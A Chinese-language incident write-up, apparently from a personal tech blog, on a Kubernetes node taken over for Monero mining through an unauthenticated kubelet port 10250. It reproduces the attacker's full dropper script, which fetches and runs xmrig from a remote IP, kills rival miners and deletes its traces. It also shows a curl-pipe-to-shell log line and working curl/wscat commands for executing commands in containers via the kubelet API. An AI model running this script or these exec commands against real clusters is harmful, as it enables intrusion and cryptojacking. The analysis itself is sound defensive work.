Kubernetes集群节点被入侵挖矿,CPU被占满

Tags: kubernetes_problem 

目录

现象

一个Kubernetes节点的CPU占用突然100%:

top - 19:43:23 up 8 days, 22:32,  2 users,  load average: 33.38, 34.45, 34.35
Tasks: 354 total,   3 running, 351 sleeping,   0 stopped,   0 zombie
%Cpu(s): 97.7 us,  2.0 sy,  0.0 ni,  0.0 id,  0.0 wa,  0.0 hi,  0.0 si,  0.3 st
KiB Mem :  7877736 total,  3239448 free,   869516 used,  3768772 buff/cache
KiB Swap:  1048572 total,  1048572 free,        0 used.  5867656 avail Mem

  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
16654 root      20   0 1513200  36612    512 S 781.8  0.5   1624:08 docker
16210 root      20   0 1513200  41752    500 S 709.6  0.5   1674:52 docker
 9381 root      20   0 1513200  39448    504 S  49.3  0.5   6234:25 docker
17550 root      20   0 1513200  37432    416 R   9.9  0.5  21:22.77 docker

是下面的几个进程在捣鬼,很奇怪:

root     16210     1 99 16:01 ?        1-03:56:41 /tmp/docker -c /tmp/k.conf
root     16654     1 99 16:03 ?        1-03:05:50 /tmp/docker -c /tmp/k.conf
root     17550     1  9 16:07 ?        00:21:24 /tmp/docker -c /tmp/k.conf

调查

Github上有人提出这个问题 “/tmp/docker -c /tmp/k.conf process use 100% CPU”

This is an issue with an insecure deployment of kubernetes. Make sure there is 
no public access to the kubelet api. If port 10250 is exposed to the public on 
any nodes, then malicious processes will be able to execute commands in pods 
running on these nodes. I've noticed the same issue recently until public access was removed.

There is a good blog post here on Medium explaining the ramifications of this.

顺藤摸瓜找到这篇文章:Analysis of a Kubernetes hack — Backdooring through kubelet

到这个进程下面发现,/tmp/docker被删除了,可能是恶意程序,启动后毁尸灭迹:

[root@proxy-67 16210]# ls -lh
total 0
dr-xr-xr-x  2 root root 0 Jul 20 19:19 attr
-rw-r--r--  1 root root 0 Jul 20 19:55 autogroup
-r--------  1 root root 0 Jul 20 19:55 auxv
-r--r--r--  1 root root 0 Jul 20 19:55 cgroup
--w-------  1 root root 0 Jul 20 19:55 clear_refs
-r--r--r--  1 root root 0 Jul 20 19:05 cmdline
-rw-r--r--  1 root root 0 Jul 20 19:55 comm
-rw-r--r--  1 root root 0 Jul 20 19:55 coredump_filter
-r--r--r--  1 root root 0 Jul 20 19:55 cpuset
lrwxrwxrwx  1 root root 0 Jul 20 19:55 cwd -> /
-r--------  1 root root 0 Jul 20 19:55 environ
lrwxrwxrwx  1 root root 0 Jul 20 19:29 exe -> /tmp/docker (deleted)
dr-x------  2 root root 0 Jul 20 19:19 fd

将进程内存dump:

$ pmap -X 16210
16210:   /tmp/docker -c /tmp/k.conf
		 Address Perm   Offset Device    Inode    Size   Rss   Pss Referenced Anonymous Swap Locked Mapping
		00400000 r-xp 00000000  fc:0a 25165962    2268   756   756        756         0    0      0 docker (deleted)
		00836000 rw-p 00236000  fc:0a 25165962      32    32    32         32        12    0      0 docker (deleted)
		0083e000 rw-p 00000000  00:00        0      36    20    20         20        20    0      0
		02571000 rw-p 00000000  00:00        0     212   144   144        144       144    0      0 [heap]
		025a6000 rw-p 00000000  00:00        0    1048   932   932        932       932    0      0 [heap]
	7f3c04000000 rw-p 00000000  00:00        0     132     8     8          8         8    0      0
	7f3c04021000 ---p 00000000  00:00        0   65404     0     0          0         0    0      0

$ gdb --pid 16210
$ (gdb) dump memory /tmp/heap2-1048.dat 0x025a6000 0x026ac000

在堆中发现了一些字符:

miner.fee.xmrig.com
emergency.fee.xmrig.com
miner.fee.xmrig.

域名www.xmrig.com被重定向了到Monero矿机到github主页:

$ curl -v  www.xmrig.com
* Rebuilt URL to: www.xmrig.com/
*   Trying 104.27.129.76...
* TCP_NODELAY set
* Connected to www.xmrig.com (104.27.129.76) port 80 (#0)
> GET / HTTP/1.1
> Host: www.xmrig.com
> User-Agent: curl/7.54.0
> Accept: */*
>
< HTTP/1.1 302 Moved Temporarily
< Date: Fri, 20 Jul 2018 12:44:41 GMT
< Transfer-Encoding: chunked
< Connection: keep-alive
< Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
< Expires: Thu, 01 Jan 1970 00:00:01 GMT
< Location: https://github.com/xmrig/xmrig
< Server: cloudflare
< CF-RAY: 43d58545d57c98ef-LAX
<
* Connection #0 to host www.xmrig.com left intact

入侵路径分析

查看下进程启动时间,一个是7月12号的(运行一周了..),另外三个是下午4点的。

# ps  -eo  pid,lstart,cmd,args  |grep k.conf
 9381 Thu Jul 12 00:02:50 2018 /tmp/docker -c /tmp/k.conf  /tmp/docker -c /tmp/k.conf
16210 Fri Jul 20 16:01:51 2018 /tmp/docker -c /tmp/k.conf  /tmp/docker -c /tmp/k.conf
16654 Fri Jul 20 16:03:13 2018 /tmp/docker -c /tmp/k.conf  /tmp/docker -c /tmp/k.conf
17550 Fri Jul 20 16:07:03 2018 /tmp/docker -c /tmp/k.conf  /tmp/docker -c /tmp/k.conf

检查kubelet日志,发现有一条比较奇怪:

Jul 20 16:03:04 proxy-67 kubelet[2108]: INFO:0720 16:03:04.807109    2108 server.go:794] GET /exec/kube-system/kubectl-k12l8/service-proxy?command=/bin/sh&command=-c&command=curl+82.146.53.166/x.sh+|+sh&input=1&output=1&tty=1: (6.226937ms) 302 [[Go-http-client/1.1] 92.63.106.91:54078]

日志显示拉取并执行了一个脚本:

curl 82.146.53.166/x.sh|sh &input=1&output=1&tty=1:

将脚本的内容拿下来查看,curl 82.146.53.166/x.sh

#!/bin/sh
pkill -f cryptonight
pkill -f sustes
pkill -f xmrig
pkill -f xmr-stak
pkill -f suppoie
pkill -f zer0day.ru

WGET="wget -O"
if [ -s /usr/bin/curl ];
        then WGET="curl -o";
fi;
if [ -s /usr/bin/wget ];
        then WGET="wget -O";
fi
if [ ! "$(ps -fe|grep '/tmp/docker -c /tmp/k.conf' |grep -v grep)" ]; then
        f1=$(curl 82.146.53.166/g.php)
        if [ -z "$f1" ];
                then f1=$(wget -q -O - 82.146.53.166/g.php)
        fi

        f2="82.146.53.166"
        if [ `getconf LONG_BIT` = "64" ]
                then
                $WGET /tmp/docker http://$f1/xmrig_64?$RANDOM
        else
                $WGET /tmp/docker http://$f1/xmrig_32?$RANDOM
        fi

        chmod +x /tmp/docker
        $WGET /tmp/k.conf http://$f2/k.conf
        nohup /tmp/docker -c /tmp/k.conf>/dev/null 2>&1 &
        sleep 5
        rm -rf /tmp/k.conf
        rm -f /tmp/docker
fi
pkill -f logo9.jpg
crontab -l | sed '/logo9/d' | crontab -

确定就是Analysis of a Kubernetes hack — Backdooring through kubelet中所说的问题了。

用telnet探测了下,中招机器的10250端口和10255端口被暴露出去了,绑了公网IP的缘故。。。

复现

用curl直接连接kublet的10250端口

curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://kube-node-here:10250/exec/<namespace>/<podname>/<container-name>?command=touch&command=hello_world&input=1&output=1&tty=1"

将POST内容替换为对应的空间和名称,从返回结果中得到websocket地址:

$ curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://10.39.1.67:10250/exec/kube-system/calico-node-5z4zh/calico-node?command=touch&command=/tmp/hello_world&input=1&output=1&tty=1"
...
< HTTP/2 302
< location: /cri/exec/PfWkLulG
< content-type: text/plain; charset=utf-8
< content-length: 0
< date: Tue, 13 Mar 2018 19:21:00 GMT
...

然后用wscat直接连接:

$ npm install -g wscat
$ wscat -c "https://10.39.1.67:10250/cri/exec/PfWkLulG" --no-check                                                                                                                     
connected (press CTRL+C to quit)
<
<
disconnected

到目标容器查看,发现hello_world文件被创建。

在尝试一下下载文件:

$ curl --insecure -v -H "X-Stream-Protocol-Version: v2.channel.k8s.io" -H "X-Stream-Protocol-Version: channel.k8s.io" -X POST "https://10.39.1.67:10250/exec/kube-system/calico-node-5z4zh/calico-node?command=/bin/sh&command=-c&command=wget+www.baidu.com&input=1&output=1&tty=1"
...
< Location: /cri/exec/gkIeqSUP
...

$ wscat -c "https://10.39.1.67:10250/cri/exec/gkIeqSUP" --no-check
connected (press CTRL+C to quit)
<
<
< Connecting to www.baidu.com (61.135.169.125:80)
index.html           100% |*******************************|  2381   0:00:00 ETA

disconnected (code: 1000)

可以看到,kubelet漏洞导致不需要任何认证就可以到容器中执行命令,通过这种方式可以在任意一个容器中安装恶意程序。

参考

  1. “/tmp/docker -c /tmp/k.conf process use 100% CPU”
  2. Analysis of a Kubernetes hack — Backdooring through kubelet
  3. Dump a linux process’s memory to file
  4. XMRig is a high performance Monero (XMR) CPU miner

kubernetes_problem

  1. kubernetes ingress-nginx 启用 upstream 长连接,需要注意,否则容易 502
  2. kubernetes ingress-nginx 的 canary 影响指向同一个 service 的所有 ingress
  3. ingress-nginx 启用 tls 加密,配置了不存在的证书,导致 unable to get local issuer certificate
  4. https 协议访问,误用 http 端口,CONNECT_CR_SRVR_HELLO: wrong version number
  5. Kubernetes ingress-nginx 4 层 tcp 代理,无限重试不存在的地址,高达百万次
  6. Kubernetes 集群中个别 Pod 的 CPU 使用率异常高的问题调查
  7. Kubernetes 集群 Node 间歇性变为 NotReady 状态: IO 负载高,延迟严重
  8. Kubernetes的nginx-ingress-controller刷新nginx的配置滞后十分钟导致504
  9. Kubernetes的Nginx Ingress 0.20之前的版本,upstream的keep-alive不生效
  10. Kubernetes node 的 xfs文件系统损坏,kubelet主动退出且重启失败,恢复后无法创建pod
  11. Kubernetes的Pod无法删除,glusterfs导致docker无响应,集群雪崩
  12. Kubernetes集群node无法访问service: kube-proxy没有正确设置cluster-cidr
  13. Kubernetes集群node上的容器无法ping通外网: iptables snat规则缺失导致
  14. Kubernetes问题调查: failed to get cgroup stats for /systemd/system.slice
  15. Kubelet1.7.16使用kubeconfig时,没有设置--require-kubeconfig,导致node不能注册
  16. Kubelet从1.7.16升级到1.9.11,Sandbox以外的容器都被重建的问题调查
  17. Kubernetes: 内核参数rp_filter设置为Strict RPF,导致Service不通
  18. Kubernetes使用过程中遇到的一些问题与解决方法
  19. Kubernetes集群节点被入侵挖矿,CPU被占满
  20. kubernetes的node上的重启linux网络服务后,pod无法联通
  21. kubernetes的pod因为同名Sandbox的存在,一直无法删除
  22. kubelet升级,导致calico中存在多余的workloadendpoint,node上存在多余的veth设备
  23. 使用petset创建的etcd集群在kubernetes中运行失败
  24. Kubernetes 容器启动失败: unable to create nf_conn slab cache
  25. 未在calico中创建hostendpoint,导致开启隔离后,在kubernetes的node上无法访问pod
  26. calico分配的ip冲突,pod内部arp记录丢失,pod无法访问外部服务
  27. kubernetes的dnsmasq缓存查询结果,导致pod偶尔无法访问域名
  28. k8s: rbd image is locked by other nodes
  29. kuberntes的node无法通过物理机网卡访问Service

推荐阅读

Copyright @2011-2019 All rights reserved. 转载请添加原文连接,合作请加微信lijiaocn或者发送邮件: [email protected],备注网站合作

友情链接:  系统软件  程序语言  运营经验  水库文集  网络课程  微信网文  发现知识星球